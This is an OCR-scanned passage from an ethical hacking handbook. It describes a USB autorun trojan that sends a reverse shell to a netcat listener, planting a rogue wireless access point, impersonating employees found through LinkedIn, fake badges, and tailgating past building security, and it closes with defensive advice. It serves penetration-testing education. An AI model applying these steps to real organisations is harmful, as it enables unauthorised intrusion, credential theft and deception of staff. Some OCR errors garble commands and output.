rectory, save your changes, and exit ISO Commander before continuing. 

Continue by clicking the Next button on the LPInstaller application, and the edited 
ISO image will be written to the flash drive. In the preceding example, an IP address is 
specified in the local network for testing purposes. From the command prompt on the 
machine that will receive the command shell from the target machine, instruct netcat 
to listen on TCP port 443 as follows: 

C:\nc -1 -p 443 



Port 443 is a common port to use as it is difficult to proxy and monitor, as the legiti- 
mate traffic that would typically flow over it is encrypted. If everything works, you will 
receive a command prompt with the drive letter that the U3 file system was assigned by 
the target machine when it was inserted, as shown here: 



t Command Prompt - nc -l -p 443 



|C:\>nc -1 -p 443 

Microsoft Windows XP [Uersion 5.1.2600] 
<C> Copyright 1985-2001 Microsoft Corp. 

|D:N>dir 

|dir 

Uolune in drive D is U3 System 
Uolume Serial Number is C8C1-1753 



: 



Directory of D:\ 



09/23/2009 

09/23/2009 

03/02/2010 

03/02/2010 



09:55 AM 
12:40 PM 
04:58 PM 
05:00 PM 

3 File<s> 
1 Dir<s> 



1,373,480 LaunchU3.exe 
5,776,407 Launchpad.zip 
<DIR> cruzer 

319 autorun. inf 
7,150,206 bytes 

bytes free 






This example used very simple tools to create a remote access Trojan. In reality, the 
attack contained on the USB drive can be vastly more complex and stealthy. Once you 
are comfortable making and writing your own ISO images to the flash drive, you can 
experiment with more complex payloads. It's even possible to create a Trojan execut- 
able to replace the LaunchU3.exe application in the event the user has autorun turned 
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off but still wants to use the U3 features. Alternatively, you can place on the USB device 
a document file with an appealing name that contains an exploit, in an attempt to en- 
tice the target to open it. As with most gray hat attacks, this one is limited only by your 
imagination. 

The Meeting 

The goal of this attack is to place an unauthorized wireless access point (WAP) on the 
corporate network. 

This attack requires face-to-face contact with the target. A pretext for a meeting is 
required, such as a desire to purchase goods or services on a level that requires a face- 
to-face meeting. Set the meeting time for just after lunch and arrive about 30 to 45 
minutes before your meeting, with the goal of catching your victim away at lunch. Ex- 
plain to the receptionist that you have a meeting scheduled after lunch but were in the 
area on other business and decided to come early. Ask whether it is okay to wait for the 
person to return from lunch. Have an accomplice phone you shortly after you enter the 
building, act slightly flustered after you answer your phone, and ask the receptionist if 
there is some place you can take your call privately. Most likely you'll be offered a con- 
ference room. Once inside the conference room, close the door, find a wall jack, and 
install your wireless access point. Have some Velcro or double-sided sticky tape handy 
to secure it out of view (behind a piece of furniture, for instance) and a good length of 
cable to wire it into the network. If you have time, you may also want to clone the MAC 
address of a computer in the room and then wire that computer into your access point 
in the event they're using port-level access control. This ruse should provide enough 
time to set up the access point. Be prepared to stay in the room until you receive con- 
firmation from your team that the access point is working and they have access to the 
network. Once you receive notification that they have access, inform the receptionist 
that an emergency has arisen and that you'll call to reschedule your appointment. 

The beauty of this attack is that it is often successful and usually only exposes one 
team member to a single target employee, a receptionist in most cases. It's low tech and 
inexpensive as well. 

In our example, we're going to use a Linksys Wireless Access Point and configure it 
for MAC cloning. For this example, you'll need 

• A Linksys Wireless Access Point 

• Double-sided Velcro tape or sticky tape 

• A 12-inch or longer CAT5 patch cable 

Have the WAP ready with double-sided tape already stuck to the desired mounting 
surface. You'll want to be prepared for unexpected configuration problems such as a 
long distance between the network wall jack or power outlet and a suitable hiding 
place. A few simple tools such as a screwdriver, utility knife, and duct tape will help you 
deal with unexpected challenges. It's also wise to have any adapters you may need. De- 
pending on which area of the country you're working in, some older buildings may not 
have grounded outlets, in which case you'll need an adaptor. In addition to physical 
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tools, you'll want to bring along a flash drive and a bootable Linux Live CD or bootable 
flash drive loaded with Knoppix or llbuntu in case there is a computer in the confer- 
ence room (there usually is). 

Once you're inside the conference room with the door closed, determine if there is 
a computer in the room. If there is, unplug its network cable and attempt to boot it 
from the CD or a flash drive. If you're successful, plug it into the wireless router and 
allow it to receive an IP from the DHCP controller. Using the browser from the Linux 
Live CD, go to the WAP IP address — typically this is 192.168.1.1 by default for most 
configurations. In our example, we'll use a Linksys Wireless-G Broadband Router. From 
the Setup tab, select Mac Address Clone and enable it, as shown next. Most WAPs give 
you the option to automatically determine the MAC address of the machine you're cur- 
rently connecting from. 



Unkbyb 

A Division ol Cisco Systems, Inc. 



Fiimware Version: v4.30.5 



Wireless-G Broadband Router WRT54GL 



Setup 



Wireless Security 



Access Application© 

Restrictions & Gaming 

| MAC Address Clone 



Enable o Disable 

User Defined Entry: 1 0 0 1 : 1 OF I : I CGI : I E2 1 : 1 4 3 1 : I AF| 



Clone Your PCs MAC 



MAC Address Clone : Some 
ISP will requre you to register 
your MAC address. If you do 
not wish to re-register your 
MAC address, you can have the 
router done the MAC address 
Rial is registered will yuur ISP. 
More... 



Save Settings J Cancel Changes 



Once set, save your settings. If the WAP you're using does not offer an option to 
automatically determine the MAC address, simply run ifeonfig from the Linux com- 
mand prompt and the MAC address of each interface on the system will be displayed. 
If you're working from Windows, ipconfig / all will display a similar list. In either case, 
you'll have to determine the active interface and manually enter the MAC address dis- 
played into the dialog box. 

Once the MAC is cloned, plug the WAP into the wall network jack the PC used to be 
in so that the WAP is in between the PC and the network wall jack. To the network it 
appears as if the computer is still connected to the network. Some infrastructures have 
network port-level security and will notice a new MAC address. By using MAC cloning, 
you are less likely to be noticed initially connecting to the network, but because you've 
put the conference room computer behind a NAT router, you may have limited access 
to it from the local network, which could lead to eventual discovery. 

Next, have a member of your team confirm that the WAP can be connected to from 
outside the building and that the corporate network is visible. While you still have the 
conference room PC booted from the Linux Live CD, grab a copy of the SAM file for 



PART II 





Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 



later cracking, as described in Chapter 8. If all goes well, you now have access to the 
internal network from nearby, so tell the receptionist you'll call to reschedule your ap- 
pointment and leave. If your team cannot get onto the internal network, take every- 
thing with you. It's not going to suddenly start working, and leaving anything behind 
could lead to being prematurely discovered. 

Join the Company 

In this attack, we'll use social media to attract employees of the target company to join 
our social networking group. The goal of the attack is to learn enough about the em- 
ployees of the target company to successfully impersonate one well enough to gain 
physical access. 

As mentioned earlier in the chapter, employees of a specific company are often eas- 
ily identified on business social networking sites like Linkedln. By searching and find- 
ing employees of the target company, it may be possible to get them to associate with 
you on the site. One simple way to do that is to create a fake profile claiming to work 
at the same company and then send invitations to every user you can find that cur- 
rently works or formerly worked at the target company. It may be slow going at first, but 
once a few of them accept your invitation, perhaps out of a desire to increase the num- 
ber of their own connections, it will legitimize you to others in the organization. Once 
connected to them, you can follow their posts and gain access to more details about 
them, including what specifically they do and who they're associated with. You can 
now also communicate directly with them through the site's messaging system. An- 
other way to associate with a group of employees is to create a group for the target 
company and send invitations to people you've identified as employees. The more peo- 
ple that join, the faster other people will join. Soon you will have access to quite a few 
employees as well as know who they associate with. 

Once you have a large enough group and enough information about associations, 
you will have multiple opportunities at your disposal. We'll focus on just one: imper- 
sonating someone. To start with, you should learn which employees work at which fa- 
cilities. Extensions, direct dial phone numbers, and mobile numbers can be a big help 
in this case as well. If possible, you'll want to select someone that is away from the of- 
fice, perhaps even on vacation. On a social media site, it's not hard to get people to talk 
about such things; you can just ask, or even start a topic thread on, where people are 
planning to vacation. Most people are more than happy to talk about it. If possible, 
target someone who looks similar to the person on your team you'll be sending into 
the company. 

A good pretext for getting into the company is that you're traveling, some urgent 
business has come up, and you need temporary access to do some work because the 
files you need are not accessible from outside the company network. Another possible 
pretext is that you're going to be in the area on a specific date and would like to stop in 
to do some work for a few hours. This is an especially powerful pretext if you use a 
spoofed caller ID to call in the request from your "boss" to security for access. In one 
recent case reported by a penetration tester, corporate security issued temporary access 
credentials based on a similar pretext and fake ID badge. Creating a fake ID badge will 
be covered in greater detail in Chapter 5. 
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This attack requires nothing but knowledge of social media sites and some time to 
get to know the people you connect with at your target company. By selecting a subject 
who you know is away from the office, you can create a window of opportunity to im- 
personate them in their absence — usually more than enough time to achieve your ob- 
jective once you have physical access to the data network. By being knowledgeable and 
conversant in company matters with the information you've collected from your social 
media assets, you can easily build rapport and trust with the employees at the target 
company online and in person while onsite. 

As this is a straightforward information-gathering attack on a company, we'll use 
Linkedln as an example. Linkedln allows a user to search by company name. Any Linked- 
In user who currently or formerly worked at the target and associated themselves with 
the company name in their profile will be listed in the search results. We can then nar- 
row the search by country, state, or region to more narrowly target individuals who 
work at the division or facility we're interested in. Once we've created a list of targets, 
we can search for the same individuals using other social media sites — Facebook, for 
example. Infiltrating multiple social networks and targeting individuals working for or 
associated with the target company will yield a lot of valuable intelligence. Using this 
information with the scenarios described in this section can provide the social engineer 
with ample attack opportunities. 

References 

ISO Commander www.isocommander.com 
Knoppix www.knoppix.com 

U3 Launchpad Installer http://mp3support.sandisk.com/downloads/ 

LPInstaller.exe 

Ubuntu www.ubuntu.com 

Windows Netcat www.securityfocus.com/tools/139 

Preparing Yourself for Face-to-Face Attacks 

It's one thing to send an e-mail to or chat with someone online during a SEA, but it's 
quite another to meet face to face with them, or even speak to them on the phone for 
that matter. When working online, you can make your attempt and then sit back and 
see if you get a result. When you're face to face, you never know what the other person 
is going to say, so you simply must be prepared for anything, including the worst. In 
order to successfully mount a face-to-face SEA, you must not only look the part you're 
playing, but also appear as comfortable as you would if you were having a relaxed con- 
versation with a friend. Ideally you want your attitude to put people at ease. This is 
easier said than done; walking across a wooden plank is easy when it's on the ground, 
but put it 50 feet in the air and suddenly it's quite difficult — not because the physical 
actions are any different, but because your mind is now acutely aware of the risk of fall- 
ing. To your body, it's the same. In social engineering, you may experience many differ- 
ent emotions, from fear to exhilaration. To achieve your goal, you're lying to and de- 
ceiving people who are probably being nice and even helpful to you. It can be extremely 
stressful. 
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If you appear nervous, you will be less convincing. People are more likely to ques- 
tion you when you appear out of place or uncomfortable; it will get you noticed for all 
the wrong reasons. Maintaining calm while attempting to deceive someone might not 
come naturally or easily for you depending on your personality and life experience. It 
can be learned, however. The most useful metric for determining how calm you are is 
your heart rate. During a face-to-face encounter with your subject or subjects, you will 
most likely experience an increase in adrenaline. This is due to a natural fight-or-flight 
response to what your mind perceives as a possible conflict or confrontation. This will 
elevate your heart rate and make your palms and/or face sweat, which may make you 
look nervous. Looking nervous is a bad thing for a social engineer who is trying to con- 
vince someone they belong and that everything is normal. 

In order to consciously manage this response, you must start by knowing your rest- 
ing heart rate. An easy way to determine this is to purchase an inexpensive wrist heart 
rate monitor such as a Mio Watch. The most accurate way to determine your resting 
heart rate is to take your pulse when you first wake up but haven't gotten out of bed. 
When you're conversing with a face-to-face target, you'll want to be within about 
20 percent of your resting heart rate to look comfortable. That means if your resting 
heart rate is 65 beats per minute (bpm), it shouldn't get over 80 bpm or you'll start to 
appear nervous. Often, an inexperienced social engineer will have a heart rate of 120 bpm 
or more during their first face-to-face attempts. This is especially true with physical 
penetrations, which are described in Chapter 5. 

You can learn to manage your heart rate using basic relaxation techniques such as 
meditation, acupressure, and reflexology. Find a technique that works for you, practice 
it, and use it just prior to executing your SEA. You can also try to retrain or desensitize 
your instinctive conflict response. Try this exercise: As you walk in public and encounter 
people, look them directly in the eye and hold eye contact with them until they break 
it or you move past them. Don't stare like a psychopath, but try not to smile or look 
threatening, either; just hold eye contact. Your heart rate will likely elevate in early 
trials, but over time this will become easier and your body won't respond as strongly to 
it. Keep in mind that this type of eye contact is a primal human dominance posture and 
could elicit an angry response. If confronted, simply and apologetically explain that 
you thought you knew the person but weren't sure. Over time you will gain more con- 
trol over your responses and reactions to conflict. You will be able to remain calm and 
act naturally when confronting a target or being confronted. 

You should also practice any discrete components of your attack plan multiple 
times prior to execution. The more times you repeat something, the more likely you'll 
be comfortable saying it one more time. It's advisable to have a base script to work from 
and then deviate as circumstances necessitate. Rehearsing as a team also helps. The 
more possible deviations you can think of ahead of time, the more relaxed and pre- 
pared you'll be when the time comes for you to meet your target face to face. 

In addition to rehearsing what you'll say, rehearse what you'll have with you — a 
computer bag, for instance, or maybe your lunch. Think about how you'll hold it. A 
common beginner mistake is to not have something to do with their hands. It seems like 
something you shouldn't have to think about, but when you feel self-conscience, you 
often forget what to do with your hands, and awkward movements can make you look 



https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 




Chapter 4: Social Engineering Attacks 

91 



very nervous. If in doubt, make sure you have things to hold, or simply think about 
where to put your hands in advance. Practice standing with your hands in your desired 
pose in front of a mirror, find positions that look best for you, and practice them. 

Another common nervous response brought on by the fight-or-flight instinct is ex- 
cess salivation. This can make you swallow nervously while you're trying to talk but can 
be easily remedied with chewing gum, a breath mint, or hard candy, any of which will 
keep your salivation more or less constant during the stressful part of your encounter 
with your target. 

Reference 

Mio Heart Monitor http://mioglobal.com 

Defending Against Social Engineering Attacks 

Hardening your environment to withstand SEAs, especially targeted ones, is more a 
matter of training than a traditional security control. An SEA goes right to the most 
vulnerable point in a company's defenses: its employees. For the reasons discussed in 
the preceding sections, people make decisions daily that impact or even compromise 
implemented security measures. Every con man knows that there is a combination of 
words or actions that will get almost anyone to unknowingly perform an action or re- 
veal information they shouldn't. This is because most people do not perceive the risk of 
their actions. Failure to perceive the risk until it is too late is at the heart of most SEAs. 

A bank teller knows that they are working in an environment that requires security 
and vigilance. They probably don't have to be reminded of the threat of robbery; they 
are aware of it and understand the risk of being robbed is very real. Unfortunately, the 
level of awareness is not the same in most corporate environments. Employees typi- 
cally perceive the threat of an SEA to be hypothetical and unlikely, even if they've been 
victimized in the past. This has to do with the perceived value of information assets. 
Money has an overt value, whereas information and data do not. 

The best defense against SEAs is awareness training and simulated targeted attacks. 
A comprehensive program will help employees recognize the value of the assets being 
protected as well as the costs associated with a breach. The program should also give 
real-world attack examples that demonstrate the threat. In conjunction with awareness 
training, simulated attacks should be regularly performed in an attempt to determine 
the effectiveness of the awareness program. Results can then be fed back into the pro- 
cess and included in ongoing awareness training. 
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Physical Penetration 
Attacks 



CHAPTER 



Placing yourself or a member of your team inside the target organization during a pen- 
etration test can be an expeditious way to access the data network infrastructure from 
behind the border controls. It is often far easier to achieve your objective from inside 
the building than from outside. Physically penetrating your target organization for the 
purposes of obtaining sensitive information might not seem immediately obvious. In 
fact, physical access is increasingly a common factor in cybercrime, especially in the 
theft of personal private information for the purposes of identity theft. 

Breaching the perimeter controls of any organization will vary in difficulty depend- 
ing on the sophistication of the systems and procedures the organization has employed 
to prevent such breaches. Even if sophisticated systems such as biometric locks are em- 
ployed, they often are easily bypassed because of relaxed or improperly followed proce- 
dures. Conversely, a seemingly open environment can be quite difficult to breach if 
personnel of the target organization are well trained and observe appropriate proce- 
dures. The gray hat hacker must make an accurate assessment of the environment before 
attempting a physical penetration. If the attempt is noticed, the whole penetration test 
may be compromised because the employees of the target organization will talk about 
an attempted break-in! 

This activity frequently requires good social engineering skills and builds upon top- 
ics discussed in the previous chapter. Once the gray hat hacker is established behind the 
border controls of the target organization, the attack opportunities are abundant. 

In this chapter, you'll learn how to prepare and conduct a physical penetration. 
We'll discuss the following topics: 

• Why a physical penetration is important 

• Conducting a physical penetration 

• Common ways into a building 

• Defending against physical penetrations 
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Why a Physical Penetration Is Important 

Anyone who has taken an information security class in the past ten years has probably 
heard the "crunchy on the outside, soft on the inside" candy bar analogy of a data net- 
work security model. This means that all the "hard" security controls are around the 
outside of the network, and the inside of the network is "soft" and easy to exploit. This 
architecture is largely prevalent on corporate networks and has even shaped contempo- 
rary malware. Despite this being common knowledge, you will, more often than not, 
encounter this network security architecture in your role as a gray hat hacker. It is im- 
portant to establish what damage could be done by a determined or bold attacker, one 
who may not even be all that technology savvy but knows someone he could sell a 
computer to. The value of personal private information, especially financial or transac- 
tion data, is now well known to smaller and less specialized criminals, and even to 
gangs. The attack doesn't always come from across the world; sometimes it's local, re- 
markably effective, and equally devastating. 

When you're initially discussing penetration testing services with your prospective 
client, your client likely won't bring up the physical penetration scenario. This scenario 
often is not considered, or is overlooked, by CIOs, IT directors, and managers who do 
not have a physical security background, unless, of course, they've already been victim- 
ized in this way. Thus, it'll be up to you to explain this type of testing and its benefits. 
In the majority of cases, once a client understands the reasons for conducting the phys- 
ical penetration test, they will eagerly embrace it. 

Conducting a Physical Penetration 

All of the attacks described in this chapter are designed to be conducted during normal 
business hours and among the target organization's employees. In this way, you can test 
virtually all of the controls, procedures, and personnel at once. Conducting an attack 
after hours is not recommended. Doing so is extremely dangerous because you might be 
met by a third party with an armed response or attack dogs. It also is relatively ineffec- 
tive because it essentially only tests physical access controls. Finally, the consequences 
of getting caught after hours are more serious. Whereas it may be slightly uncomfort- 
able to explain yourself to an office manager or security officer if you're caught during 
the day, explaining yourself to a skeptical police officer while in handcuffs if you're 
caught during the night might lead to detention or arrest. 

You should always have a contact within the target organization who is aware of 
your activities and available to vouch for you should you be caught. This will typically 
be the person who ordered the penetration test. While you shouldn't divulge your plans 
in advance, you and your client should agree on a window of time for the physical pen- 
etration activities. Also, since you will be targeting data assets, you may find yourself 
covertly working in close proximity to the person who hired you. It's a good idea to ask 
your client in advance to act as if they don't know you if they encounter you on the 
premises. Since they know what you have planned, they are not part of the test. Once 
this groundwork is in place, it is time to begin the planning and preparations to con- 
duct the physical penetration. 
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Reconnaissance 

You have to study any potential target prior to attempting a physical penetration. While 
most of the footprinting and reconnaissance activities in this book relate to the data 
network, the tools to look at the physical entities are much the same — Google Maps 
and Google Earth, for instance. You also have to physically assess the site in person 
beforehand. If it's possible to photograph potential entrances without drawing atten- 
tion to yourself, those photos will be useful in planning your attack. Getting close 
enough to determine what kind of physical access controls are in place will be helpful 
in planning your attempt to subvert them. 

The front entrance to any building is usually the most heavily guarded. It's also the 
most heavily used, which can be an opportunity, as we'll discuss later in this chapter. 
Secondary entrances such as doors leading to the smokers' area (smokers' doors) and 
loading docks usually offer good ingress opportunity, as do freight elevators and service 
entrances. 

Sometimes smoking doors and loading docks can be discernible from publicly 
available satellite imagery, as this Google Earth image of a loading dock illustrates: 




When you survey the target site, note how people are entering and exiting the build- 
ing. Are they required to use a swipe card or enter a code to open the outer door? Also 
note details such as whether the loading dock doors are left open even when there isn't a 
truck unloading. You should closely examine the front door and lobby; choose someone 
from your team to walk in and drop off a handful of takeout menus from a nearby 
restaurant. This will give you some idea of how sophisticated their security controls are 
and where they're located. For instance, you may walk into an unsecured lobby with a 
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reception desk and see that employees use a swipe card to enter any further beyond the 
lobby into the building. Or you could encounter a locked outer door and a guard who 
"buzzes" you in and greets you at a security desk. Observe as much as you can, such as 
whether the security guard is watching a computer screen with photo IDs of people as they 
use their swipe or proximity cards to open the outer door. Keep in mind that this exposes 
you or one of your team members to an employee of the target organization who may 
recognize you if you encounter them again. If you've encountered a professional security 
guard, he will remember your face, because he's been trained to do so as part of his job. 
You'll most likely be on the target organization's security cameras as well. 

Sometimes the smokers' door or a viable secondary entrance will be behind a fenced 
area or located on a side of the building away from the street or parking area. In order 
to assess the entrance up close, you'll have to look like you belong in the area. Achiev- 
ing this really depends on the site and may require you to be creative. Some techniques 
that have been used successfully in the past include the following: 

• Using a tape measure, clipboard, and assistant, measure the distance between 
utility poles behind a fenced-in truck yard in order to assess the loading docks 
of a target. If confronted, you're just a contractor working for the phone or 
electric company. 

• Carrying an inexpensive pump sprayer, walk around the perimeter of a 
building spraying the shmbs with water while looking for a smokers' door 
or side entrance. 

• Carrying your lunch bag with you, sit down outside and eat lunch with the 
grounds maintenance crew. They'll think you work at the organization; you'll 
get to watch the target up close for a half hour or so. You may even learn 
something through small talk. 

In addition to potential ingress points, you'll want to learn as much as possible about 
the people who work at the organization, particularly how they dress and what type of 
security ID badge they use. Getting a good, close look at the company's ID badges and 
how the employees wear them can go a long way toward helping you stay out of trouble 
once you're in the building. Unless the target organization is large enough that it has its 
own cafeteria, employees will frequent local businesses for lunch or morning coffee. This 
is a great opportunity to see what their badges look like and how they wear them. Note 
the orientation of the badge (horizontal vs. vertical), the position of any logos or photos, 
and the color and size of the text. Also note if the card has a chip or a magnetic stripe. 

You need to create a convincing facsimile of a badge to wear while you're in the 
target's facility. This is easy to do with a color printer and a few simple supplies from an 
office supply store such as Staples or OfficeMax. If the badge includes a corporate logo, 
you'll most likely be able to find a digital version of the logo on the target organiza- 
tion's public website. In addition to creating your badge, you'll want to use a holder 
that is similar to those observed during your reconnaissance. 

Now that you know about some potential ingress points, some of their access con- 
trols, what the security badges look like, and how the employees dress, it's time to come 
up with a way to get inside. 
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Mental Preparation 

Much like the preparation for the social engineering activities discussed in the previous 
chapter, a significant part of the preparation for a physical penetration is to practice 
managing yourself in a stressful and potentially confrontational situation. You're going 
to meet face to face with employees of your target. If you're nervous, they're going to 
notice and may become suspicious. (If you are reading this chapter before Chapter 4, 
you should refer to the section "Preparing Yourself for Face-to-Face Attacks" prior to 
actually attempting a physical penetration.) Most importantly, you should be ready to 
answer questions calmly and confidently. If the inquisitive employee is simply curious, 
your level of confidence may determine whether they go on their way, satisfied with 
your answers, or become suspicious and ask more questions, call security, or confront 
you directly. You must always remain calm. The calmer you remain, the more time 
you'll have to think. Remember, you're working for them, you're both on the same 
team, you're not doing anything wrong, and you're allowed to be there. If you can con- 
vince yourself of that, you will carry yourself in a way people can simply sense, you'll 
blend in. 

It's a good idea to practice ahead of time with a partner your answers to questions 
you'll commonly encounter. For instance: 

• I don't think we've met; are you new? 

• Who are you working for? 

• We have this conference room scheduled; didn't you check with 
reception first? 

• Are you lost/looking for someone/looking for something? 

• May I help you? 

These are just a few common questions you may encounter. Having a smooth and 
practiced answer for each will go a long way toward keeping your cover. You will also 
have to think on your feet, however, as you'll certainly be asked questions you haven't 
thought of. These questions will require quick thinking and convincing answers, which 
is another reason why it is so important to be mentally prepared and remain calm dur- 
ing a physical penetration. 

Common Ways into a Building 

In this section, we're going to discuss a few common and likely successful physical pen- 
etration scenarios. As with the social engineering attacks described in Chapter 4, it is 
important to keep in mind that these attacks may not work every time, or may not work 
on your specific target, as each environment is different. We're not going to discuss 
what attacks to perform once you're inside the facility; rather, insider attacks will be 
covered in more detail in Chapter 6. The goal of this chapter is simply to give you 
enough information to enable you to get into your target's facility. Once inside, you can 
then put the valuable things you've learned in this book to their intended use. 
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The Smokers* Door 

Whether it's a bank, a factory, or a high-rise office building, employees typically are not 
allowed to smoke in the office environment. This has led to the practice of taking a 
smoking break outside of the building. As a cluster of employees huddled around an 
ashtray smoking isn't the image most companies want to project to the public, the 
smoking area is usually located at or near a secondary entrance to the building. This 
entrance may or may not be protected by a card reader. In some cases, the smokers' 
door is propped open or otherwise prevented from closing and fully locking. Because 
the smokers' door is a relatively active area and mostly used for one specific purpose, it 
represents an excellent opportunity to enter a building unnoticed, or at least unchal- 
lenged. 

In order to use the smokers' door as your physical access to your target, you need 
only three items: a pack of cigarettes, a lighter, and a convincing ID badge. If possible, 
you should park your car close to or within sight of the smokers' door so that you can 
watch and get the rhythm of the people going in and out of the door. You should be 
dressed as if you just got up from your desk and walked out of the building. Do not 
attempt to enter a smokers' door dressed as if you're just arriving to work. Everything 
you need for your activities inside must be concealed on your person. You must also be 
prepared for some small talk if you happen to encounter someone at the door. 

A good way to approach the door is to wait until no one is near the door and then 
walk up holding a pack of cigarettes visibly in your hand. That way, if someone opens 
the door and sees you approaching, they'll assume you're returning from your car with 
more cigarettes. It's also easy to explain if confronted. If the door is locked, pick up a 
cigarette butt from the ashtray or light one you've brought and wait for the door to 
open. When it does, simply grab the door, toss your cigarette butt into the ashtray, and 
nod to the person emerging as you enter. It's best to carry your pack visibly as you walk 
into the building. In most cases, entry is as simple as that. We'll discuss what to do once 
you're inside later in this chapter. 

If traffic through the door is really busy, you may have to smoke a cigarette in order 
to achieve your goal. It's not hard to fake smoking, with a little practice. Approaching 
the door with the pack of cigarettes visible, remove one and light it. You must be pre- 
pared to explain yourself. That means everything from why you just walked up to the 
door from the outside to who you're working for and why you haven't been seen smok- 
ing here in the past. If you have convincing answers, you won't have a problem. 

Having a conversation with an employee while trying to gain access can help keep 
you within reach of the entrance you want, but it can also go wrong very quickly. One 
way to mitigate the threat of a conversation going awry is to have an accomplice watch- 
ing nearby. Negotiate a signal in advance that indicates you need help, such as locking 
your fingers and stretching your arms palms out in front of you. Seeing the signal, your 
accomplice can call you to interrupt the conversation with the employee. You may even 
be able to time the one-sided conversation with an opportunity to enter the building: 

"Yes, I'm on my way back to my desk now." Since most mobile phones have a silent 
mode, it is also possible to simply answer your phone as if someone has called you. If 
you do that, be sure the ringer is turned off to avoid an actual call coming in during 
your ruse! 
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In some cases, the smokers' door may simply be propped open, unattended, with 
no one about. In that case, just walk in. You should still act as if you're returning from 
your car, pack of cigarettes in hand, as you may be tracked on a security camera. Re- 
member, just because you don't see anyone doesn't mean you're not being watched. 
Take your time and pretend to smoke a cigarette outside the door. It'll help answer the 
questions anyone who might be watching is asking themselves. Charging straight for 
the door and hastily entering the building is a good way to alert a security guard to the 
presence of an intruder. 

Manned Checkpoints 

In some penetration tests, you will encounter a manned checkpoint such as a guard 
desk or reception area in the lobby of a building. Sometimes visitors are required to 
check in and are issued a visitor badge before they are allowed access to the building. 
In the case of a multifloor or high-rise office building, this desk is usually between the 
lobby doors and the elevators. In the case of a building in a high-security area, visitors 
and employees alike may be required to enter through a turnstile or even a mantrap 
(described later in the chapter). This all sounds rather formidable, but subverting con- 
trols like these can often be rather simple with a little bit of creative thinking and some 
planning. 

Multitenant Building Lobby Security 

Multifloor, multitenant office buildings usually have contract security staff positioned 
in the lobby. The security procedure is usually straightforward: you sign in at the desk, 
present a photo ID, and explain who you are there to see. The guard will call the person 
or company, confirm you have an appointment, and then direct you to the appropriate 
elevator. There may also be a badge scanner. In most cases, you will be issued an adhe- 
sive-backed paper visitor badge, which may have your name and a printed photo of you 
on it. 

If you wish to fully understand the lobby security process for a specific building 
prior to attempting to subvert it, make an appointment with another tenant in the 
building. Make arrangements, for example, to talk to another tenant's HR department 
about a job application, to drop off donation forms for a charity at another tenant's PR 
department, or even to present a phony sales pitch to another tenant. This will give you 
the experience of going through the building security process as a visitor, end to end. 
You will also get a close look at the visitor badge that is issued. Most lobby security 
companies use a paper self-adhering badge that changes color in a set amount of time 
to show it has expired. This works by exposure to either air or light. By peeling your 
badge off and placing it inside a book or plastic bag, you will slow down this process, 
possibly enabling you to reuse the badge on a different day (assuming they don't ask 
for it back before you leave the building). If the badge fades or you wish to include 
other team members in the physical penetration attack, visitor badges are widely avail- 
able at most office supply stores. It is also possible to make a printed facsimile of the 
badge, printed on self-adhesive label stock; it only has to look convincing from a short 
distance. 
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Once you have a visitor badge, it's time to get to your target's floor. You can usually 
determine which floor of the building is occupied by your target by using public re- 
sources, such as those you can locate with Google. It's not uncommon for a company 
to list departmental floors on its public website. It's also increasingly common to un- 
cover property leases online if your target company is publicly traded. The leases speci- 
fy which properties and floors are leased, and you may discover offices that are not 
listed on the public website or building directory. 

The whole point of the visitor badge is to get you into the building without having 
to check yourself in with a legitimate ID badge. If the building you're trying to enter 
does not have turnstiles or some sort of ID system, you can certainly just try to get onto 
the elevators using a facsimile of the target company's badge. If turnstiles are used, then 
the visitor badge is more likely to be successful. With a visitor badge, you can use bag 
checks and scanners to your advantage is some cases. By entering the lobby and pro- 
ceeding directly to the bag checker or scanner operator, they will see your visitor badge 
and assume you've been cleared by the front desk guard, while the front desk guard will 
assume the bag checker or scanner operator will send you back if you don't have a 
badge. This works especially well in a busy lobby. A quick scan or peek at your com- 
puter bag and you're on your way! 

If there are no turnstiles, entry to the building may be as simple as following a 
crowd of people into the building. Lobby security in some areas is remarkably lax, us- 
ing only one or two guards who simply eyeball people walking in and try to direct visi- 
tors to their destinations. In this case, gaining access to the building is as simple as 
entering during a high-volume traffic time such as the start of the work day or the end 
of the lunch hour. In this case, you'll want to have a convincing facsimile of an em- 
ployee or visitor badge from the target company. 

Some lobby security will have a guard at a choke point where one person passes 
through at a time. The guard will check credentials or, in some cases, watch a video 
screen as each person swipes their ID card to ensure the photo of them that appears 
onscreen matches. This level of security is very difficult to defeat directly. A better ap- 
proach would be to gain access to the building by arranging some sort of an appoint- 
ment with another tenant, as previously discussed. While most security procedures 
require that a visitor be vetted by the hosting tenant, very few processes require the ten- 
ant to notify lobby security when the visitor leaves. This gives you an ample window of 
opportunity to try to access the floor of your target by removing your visitor badge and 
using your fake company ID badge once you've concluded your appointment with the 
other tenant. If for some reason you're still not sure which floor(s) your target occupies, 
you can always follow someone in with a badge from your target company and observe 
which floor they exit on. As you get onto the elevator, just press the top-floor button 
and watch. You can then get off on the target's floor on your way back down. 

If the target company is located in a multitenant high-rise building, it mostly likely 
has offices on multiple floors if it's not a small company. It will be much easier to make 
an entrance onto a floor that is not used for general public reception. The main recep- 
tion desk usually has special doors, often glass, a receptionist, and a waiting area. It'll 
be like the lobby, but a lot harder to get past. Employee-only floors typically have a 
regular door, usually locked but unmanned. We'll talk about getting by locked doors a 
little later in this chapter. 
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Campus-Style or Single-Tenant Buildings 

If the target company owns its own buildings or rents them in their entirety, it may 
provide its own security personnel and procedures to manage lobby or checkpoint se- 
curity. This will require an entirely different approach to gaining entry to the building 
beyond the checkpoint or lobby. While it is possible to figure out what kind of visitor 
badge system is used, you'll only get to try that once as you can't test it on another ten- 
ant in the building. You could try to get an appointment with someone inside the 
building as well, but they'll most likely escort you to the lobby or checkpoint and take 
your visitor badge when your meeting is over. 

This sort of checkpoint is best defeated as a team, with one or more team members 
providing a distraction while another skirts the checkpoint. Unless the target company 
is very large or operating in a high-security environment, it will not have turnstiles. It 
will either have a locked lobby to which a guard inside grants access to visitors while 
employees use a key card access system, or have an open lobby with a desk. Both can be 
defeated in essentially the same way. 

Again, this entry is best attempted during the lunch hour. You need as many decoys 
as there are guards at the desk, the idea being to engage each one of them while an- 
other member of the party walks by posing as an employee. The decoys should be 
dressed as if they are just arriving, whereas the entrant should dress as though he's left 
and come back with his lunch. Anything the entrant needs inside should be concealed 
on his person. The entrant should answer the guard's questions visually before they're 
even asked — he should be wearing a convincing facsimile of the target company's badge 
and carrying a bag of takeout food from a local vendor. It's best to wait for a group of 
employees returning from lunch or with their lunch; the more traffic in the lobby, the 
